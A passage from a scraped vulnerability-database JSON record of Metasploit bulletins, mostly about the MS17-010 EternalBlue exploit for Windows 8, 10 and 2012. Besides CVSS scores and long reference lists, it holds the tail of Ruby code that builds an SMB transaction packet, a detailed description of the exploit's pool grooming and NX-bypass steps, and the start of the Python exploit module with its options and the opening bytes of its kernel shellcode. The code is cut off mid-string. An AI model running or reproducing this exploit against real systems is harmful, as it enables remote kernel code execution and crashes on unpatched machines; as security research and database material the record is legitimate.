= Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x23 = PeekNamedPipe, fid = 0\n setup = \"\\x23\\x00\\x00\\x00\"\n setup_count = 2 # 2 words\n trans = \"\\\\PIPE\\\\\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['ParamCountMax'] = 0xffff\n pkt['Payload'].v['DataCountMax'] = 0xffff\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataOffset'] = data_offset\n\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "52e40933ae55680339314c4c47c4218f"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "a350165a58d78e6a7f1ec63091a5caba"}, {"key": "published", "hash": "35e1b19fef57800a5842324245a84fa8"}, {"key": "references", "hash": "69112e68efb0c9ff708d829d011d07e9"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "76342054b3e7ed2a9d215428f6b2e311"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "hash": "2edf1b51caf23fee7da6fbe8c1ee78e99dad2e9443e342b20d7988a241d64851", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "published": "2018-06-18T16:41:57", "modified": "2019-11-02T02:20:22", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/worawit/MS17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-09-18T18:32:29", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-09-18T18:32:29", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-18T18:32:29", "rev": 2, "value": 7.5, "vector": "NONE"}}, "hash": "437b5fe7da2be13bd1427ad43d5d290b7ff1ed11518cae3d7dda200faae3ebb1", "hashmap": [{"hash": "b60f5906fe6c7ab38d837f22d4eafee6", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6c1573fb8afad953575e88410f63a2fc", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "a399fb2a0d2b54be61b63ce9fb2f1e84", "key": "title"}, {"hash": "5b950e6a1604ac171f8fe1ccc327b50e", "key": "references"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "bc9f4d2df77a7e598c51cbbb28b6c763", "key": "modified"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "142f691ada068c40ae71fdd0eac8502e", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "immutableFields": [], "lastseen": "2020-09-18T18:32:29", "modified": "2019-11-02T02:20:22", "objectVersion": "1.5", "published": "2018-06-18T16:41:57", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 451}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-09-18T18:32:29"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "enchantments": {"dependencies": {"modified": "2020-01-08T17:48:55", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-01-08T17:48:55", "value": 7.7, "vector": "NONE"}}, "hash": "e2220776e8cde746959dfd4abe7c3c98", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "lastseen": "2020-01-08T17:48:55", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "#!/usr/bin/env python\n\nimport sys\nimport socket\nfrom struct import pack\nfrom base64 import b64decode\n\ntry:\n from impacket import smb, ntlm\nexcept ImportError:\n dependencies_missing = True\nelse:\n dependencies_missing = False\n\nfrom metasploit import module\n\nmetadata = {\n 'name': 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+',\n 'description': '''\n EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya\n The exploit might FAIL and CRASH a target system (depended on what is overwritten)\n The exploit support only x64 target\n\n Tested on:\n - Windows 2012 R2 x64\n - Windows 8.1 x64\n - Windows 10 Pro Build 10240 x64\n - Windows 10 Enterprise Evaluation Build 10586 x64\n\n\n Default Windows 8 and later installation without additional service info:\n - anonymous is not allowed to access any share (including IPC$)\n - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows\n - tcp port 445 is filtered by firewall\n\n\n Reference:\n - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\n - \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\n\n\n Exploit info:\n - If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\n - The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP.\n - The exploit is likely to crash a target when it failed\n - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\n - If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5)\n - See the code and comment for exploit detail.\n\n\n Disable NX method:\n - The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\n - The exploit is also the same but we need to trigger bug twice\n - First trigger, set MDL.MappedSystemVa to target pte address\n - Write '\\\\x00' to disable the NX flag\n - Second trigger, do the same as Windows 7 exploit\n - From my test, if exploit disable NX successfully, I always get code execution\n ''',\n 'authors': [\n 'Equation Group', # OG research and exploit\n 'Shadow Brokers', # Hack and dump\n 'sleepya', # Research and PoC\n 'wvu' # Babby's first external module\n ],\n 'references': [\n {'type': 'msb', 'ref': 'MS17-010'},\n {'type': 'cve', 'ref': '2017-0143'},\n {'type': 'cve', 'ref': '2017-0144'},\n {'type': 'cve', 'ref': '2017-0145'},\n {'type': 'cve', 'ref': '2017-0146'},\n {'type': 'cve', 'ref': '2017-0147'},\n {'type': 'cve', 'ref': '2017-0148'},\n {'type': 'edb', 'ref': '42030'},\n {'type': 'url', 'ref': 'https://github.com/worawit/MS17-010'}\n ],\n 'date': 'Mar 14 2017',\n 'type': 'remote_exploit',\n 'rank': 'average',\n 'privileged': True,\n 'wfsdelay': 5,\n 'targets': [\n {'platform': 'win', 'arch': 'x64'}\n ],\n 'options': {\n 'RHOST': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},\n 'RPORT': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 445},\n 'ProcessName': {'type': 'string', 'description': 'Process to inject payload into.', 'required': False, 'default': 'spoolsv.exe'}, \n 'GroomAllocations': {'type': 'int', 'description': 'Initial number of times to groom the kernel pool.', 'required': True, 'default': 13},\n # if anonymous can access any share folder, 'IPC$' is always accessible.\n # authenticated user is always able to access 'IPC$'.\n # Windows 2012 does not allow anonymous to login if no share is accessible.\n 'SMBUser': {'type': 'string', 'description': '(Optional) The username to authenticate as', 'required': False, 'default': ''},\n 'SMBPass': {'type': 'string', 'description': '(Optional) The password for the specified username', 'required': False, 'default': ''}\n },\n 'notes': {\n 'AKA': ['ETERNALBLUE']\n }\n}\n\n\n\ndef hash(process): \n # calc_hash from eternalblue_kshellcode_x64.asm \n proc_hash = 0\n for c in str( process + \"\\x00\" ):\n proc_hash = ror( proc_hash, 13 )\n proc_hash += ord( c )\n return pack('<I', proc_hash)\n\ndef ror( dword, bits ):\n return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF\n\n# git clone https://github.com/worawit/MS17-010\n# cd MS17-010/shellcode\n# nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin\ndef eternalblue_kshellcode_x64(process=\"spoolsv.exe\"):\n proc_hash = hash(process)\n return (\n '\\x55\\xe8\\x2e\\x00\\x00\\x00\\xb9\\x82\\x00\\x00\\xc0\\x0f\\x32\\x4c\\x8d'\n '\\x0d\\x34\\x00\\x00\\x00\\x44\\x39\\xc8\\x74\\x19\\x39\\x45\\x00\\x74\\x0a'\n '\\x89\\x55\\x04\\x89\\x45\\x00\\xc6\\x45\\xf8\\x00\\x49\\x91\\x50\\x5a\\x48'\n '\\xc1\\xea\\x20\\x0f\\x30\\x5d\\xc3\\x48\\x8d\\x2d\\x00\\x10\\x00\\x00\\x48'\n '\\xc1\\xed\\x0c\\x48\\xc1\\xe5\\x0c\\x48\\x83\\xed\\x70\\xc3\\x0f\\x01\\xf8'\n 